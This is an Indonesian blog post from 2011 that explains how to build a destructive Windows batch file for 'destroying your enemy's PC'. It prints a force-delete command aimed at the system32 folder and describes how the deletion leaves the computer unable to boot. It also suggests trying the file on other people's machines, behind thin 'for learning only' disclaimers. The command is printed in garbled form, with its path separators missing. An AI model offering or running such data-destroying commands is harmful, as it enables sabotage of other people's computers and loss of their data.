Recent Post Cyber4rd :

Minggu, 18 September 2011

Tehnik Mengahancurkan PC musuhmu

assalamualaikum

  Did'di cuma mau share ini aja kok
jangan di tiru yah,,.....
dan klo salah post atau repost mohon di maaf kan
WARNING
ane disini menjelaskan untuk membuat sebuah file yang menghancurkan pc korban?
ane tidak bertanggung jawab atas kerusakan yang disebabkan oleh file ini.

CATATAN:-plzz jangan coba-coba (HANYA UNTUK TUJUAN PEMBELAJARAN SAJA )

-------------------------------------------------- -------------------------------------------------- -----

ok langsung saja ke caranya :

1. Buka Notepad
2. lalu tulis perintah berikut: -


PHP Code:


del c:WINDOWSsystem32*.*/q




3. Simpan notepad tersebut dengan ekstensi ".bat atau .cmd "
4. !!!!!!!!!!!!!!!!!!!!!! Perhatian !!!!!!!!!!!!!!!!!!! !
Jangan klik dua kali file tersebut kalau gak mau dalam kesulitan.
Mengapa ?????? file barusan yang kamu ciptakan menghapus semua file dari komputer ente ahakz,.....
folder system32 dan ketika kamu restart pc mu tidak akan mulai
coz sistem tidak dapat menemukan file dalam folder system32 yang
diperlukan pada saat booting.
5. Anda juga dapat menguji di atas dengan membuat folder palsu membiarkan rasa
windows1 di C: \. Menyalin beberapa file lama di dalamnya dan hanya mengikuti atau meniru nya saja
atas command.karena mengklik file yang kamu ganda atau copy bat atau cmd semua file otomatis bisa dihapus.
6. kamu dapat mencoba file ini di komputer manapun satu `s (tapi. ini menyebabkan menyebabkan kerusakan pada
komputer, jadi berpikir lagi sebelum mencoba ini di pc siapa pun apalagi di pc ente sendiri )
-------------------------------------------------- -------------------------------------------------- -----
ingat ini cuma buat share ilmu aja sambil belajar no untuk yang macam2

wassalam

jangan Di salah gunakan Artikel ini, ini hanya untuk pembelajaran


0 komentar:

Posting Komentar

JANGAN LUPA TINGGALKAN KOMENTAR ANDA

Galaxy-Zone 7 © 2008. Design by :Templates Sponsored by: Tuto Comment
x

join to my fans at facebook